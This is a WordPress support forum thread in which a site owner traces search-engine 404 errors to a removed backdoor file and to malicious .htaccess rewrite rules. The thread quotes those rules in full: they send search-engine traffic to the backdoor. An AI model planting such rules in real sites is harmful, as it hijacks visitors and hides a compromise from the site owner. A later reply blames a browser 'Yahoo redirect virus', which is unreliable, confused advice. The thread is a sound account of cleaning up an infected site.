Search Engine 404 Errors After Removing Suspicious PHP File

  • Hello,

    I have a WordPress site with Jetpack. A few weeks ago, my Wordfence scan detected several suspicious PHP files, which I carefully removed. On the same night that WordFence detected the files, I also received a security warning email from my GoDaddy Sucuri site monitoring, which was cleared the following day after their removal. One of these files, described by WordFence as “a backdoor known as yzep,” was located in the root directory and titled “example.php”.

    Now, when clicking on a link to my website from a Google search, I get a 404 error saying: “The requested URL /example.php was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.” Presumably as a result of this, the traffic to my site has decreased substantially in the interim.

    If I refresh the page the error persists, but if I reload it via the address bar it will load as normal. This has happened with every page I have attempted to access from a Google or Yahoo search on every browser and device I have tried, but does not seem to occur on Bing, StartPage, or DuckDuckGo. It also does not appear to affect the two secondary domains I have on the same hosting plan (one WordPress, one Simple Machines Forum) in any way. Otherwise, the affected website appears to be functioning properly. Links from other, non search engine websites do not seem to be affected either.

    Just in an attempt to troubleshoot, I tried uploading a blank file named “example.php” and the Google results simply loaded a blank page.

    The only plugins I have installed are the aforementioned Jetpack and Wordfence, Classic Editor, UpdraftPlus, Wp-SpamShield, and Quotes Collection. I can also attach the contents of “example.php” if it would be of any use.

    I am hoping that someone here may be able to offer some advice on how I might go about fixing this problem.

    Thanks very much in advance.

    The page I need help with: [log in to see the link]

Viewing 4 replies - 1 through 4 (of 4 total)

  • Im having the exact same issue.

    Thread Starter R.C. Montgomery

    (@conelrad)

    To add a little more information, I checked my site with Sucuri’s site checker, and it received the same 404 error. I’ve also examined my .htaccess, index.php, header and footer.phps, and several other files, and could not find any code that looked suspicious. I’m something of a neophyte on things like this, however, so I really don’t know where to look, or what I would have to do to fix this problem.

    I would be happy to provide any further details that I can, and any assistance or advice on this issue would be enormously appreciated.

    Thread Starter R.C. Montgomery

    (@conelrad)

    It appears that I may have figured out the solution. As it turns out, there was some troublesome code in the .htaccess after all, which was directing search engine traffic to “example.php”. I removed the code in question, and now it seems to be working correctly (knock on wood), both via search engines and Sucuri site check.

    This was the code I removed from .htaccess:

    RewriteBase /
    RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
    RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
    RewriteCond %{HTTP_HOST} oldtimeblues\.net
    RewriteRule . example.php [L,S=10000]

    Hi,

    Can I add my experience to this thread? Or is it closed for good?
    It seems to be another spin-off of Yahoo redirect virus.
    [Updated] I see the above gets published. So basically the issue is about setting up a redirect algoryhtm. It typically resolves on a computer level, but also occurs as a websites bug. Here is more details: https://applehelpwriter.com/yahoo-search-redirect-mac-virus-removal/
    Ignore that the article says it’s a mac virus. It is a browser issue, and if you use Chrome you gonna have it no matter what kind of OS you stick to.

    • This reply was modified 3 years, 8 months ago by samotyo.
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Search Engine 404 Errors After Removing Suspicious PHP File’ is closed to new replies.

Tags